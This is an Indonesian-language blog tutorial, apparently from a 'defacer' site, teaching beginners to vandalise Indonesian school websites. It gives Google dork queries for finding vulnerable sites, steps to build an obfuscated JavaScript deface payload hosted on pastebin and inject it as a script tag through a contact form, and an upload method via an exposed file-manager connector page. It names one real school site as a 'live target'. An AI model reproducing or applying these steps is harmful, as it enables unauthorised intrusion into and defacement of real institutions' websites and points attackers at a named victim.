Berdasarkan target defacer pemula, web sekolah adalah sasaran yang memiliki tingkat kesulitan rendah selain web pemerintah. Alasannya, karena sering muncul di hasil pencarian google dork untuk query situs vuln.
Pada tutorial kali ini saya akan membagikan cara deface web sekolah menggunakan 2 metode berbeda, yaitu jso dan tebas index.
Untuk pengertian apa itu jso dan tebas index, bisa kalian klik link dibawah ini:
https://omcyber.com/cara-deface-website/
Sedangkan untuk tutorial defacenya, ikuti langkah-langkah berikut ini.
Cara deface web sekolah sch.id
Dinamakan web sekolah karena nama domain atau linknya berakhiran .sch.id, contoh sman1bandung.sch.id.
Tidak semua website sekolah dapat dideface, tetapi hanya web yang memiliki celah saja. Untuk menemukan celahnya kalian bisa menggunakan bantuan aplikasi termux.
Baca juga: cara mencari web vuln di termux.
Sebelum melakukan deface, buat dulu script deface untuk menampilkan pesan atau nama underground/hacker kalian. Contoh, hack by omcyber, dll.
Script deface bisa kalian download di google atau buat disini.
Bagi yang sudah mempunyai script defacenya, sekarang tinggal memilih metode deface dibawah ini.
1. Deface web sekolah jso
Intinya, kalian harus meng-upload script jso ke web sekolah yang berstatus vuln. Cara upload bisa dari halaman pendaftaran atau sejenisnya.
Untuk menemukan halaman pendaftaran, bisa menggunakan query google dork berikut:
intext:”sistem informasi kelulusan” site:sch.id
Kemudian pilih salah satu website yang muncul di hasil pencarian google.
Setelah masuk ke situs yang dipilih, cari menu hubungi kami. Kemudian upload script Jso kalian, kalau belum punya buat dulu dengan mengikuti tutorial dibawah.
a. Cara membuat script jso
Untuk membuat script jso, kalian dapat menggunakan tools jso generator. Linknya ada dibawah.
Berikut penggunaannya:
- Pada tampilan awal situs jso generator, masukkan semua kode html dari script deface kalian.
- Kemudian copy semua angka yang muncul dibagian hasil.
- Tambahkan kode document.documentElement.innerHTML=String.fromCharCode(kode angka jso).
- Paste semua kode di situs pastebin.com kemudian pilih create new paste.
- Tekan menu raw untuk menyalin link script jso yang sudah jadi.
Script jso adalah script deface yang diubah agar dapat menembus kerentanan website. Setelah berhasil membuatnya, lanjut ke proses upload.
b. Cara upload script jso ke website target
Pada kolom pengisian, isi saja data asal. Tetapi pada kolom pesan, masukkan script jso kalian dengan menambah kode berikut:
<script type=”text/javascript” src=”link raw pastebin”></script>)
Contoh:
<)
Selanjutnya tekan kirim.
Apabila proses pengiriman berhasil, maka tandanya web sekolah tersebut sudah berhasil dideface.
Untuk mengetahui hasilnya, akses alamat situs ditambah admin/hubungi.php. Contoh: sman1bandung.sch.id/admin/hubungi.php
2. Deface web sekolah tebas index
Untuk menggunakan tebas index masih sama menggunakan google dork, hanya saja berbeda pada query yang digunakan. Selain itu, dengan tebas index bisa meng-upload gambar sebagai script defacenya.
Dork yang digunakan untuk tebas indek web sekolah adalah:
- inurl:/html/siswa.php?
- inurl:/html/alumni.php?
- inurl:/html/guru.php?
Silahkan kalian dorking saja dulu sampai menemukan web sekolah yang vuln.
Atau bisa menggunakan situs live target saya dibawah ini:
https://www.sditlhbandung.sch.id/
Setelah menemukan situs target, ikuti langkah-langkah tebas indek web sekolah berikut ini:
- Tambahan /editor/filemanager/connectors/test.html dibelakang alamat situs.
- Ubah kolok konektor *ASP menjadi *PHP.
- Upload file script deface di kolom upload file.
Apabila file berhasil diupload, maka proses deface web sekolah tebas indek berhasil.
Untuk melihat hasilnya, akses alamat situs ditambah /userfiles/file/namascript. Contoh: https://www.sditlhbandung.sch.id/userfiles/file/omcyber.html.
Apabila ingin upload file script deface gambar, maka pada kotak file resource type ubah ke image.
Nah, demikian tutorial cara deface web sekolah sch.id menggunakan jso dan tebas index. Bagi yang masih kesulitan, sampaikan dari kolom komentar ya.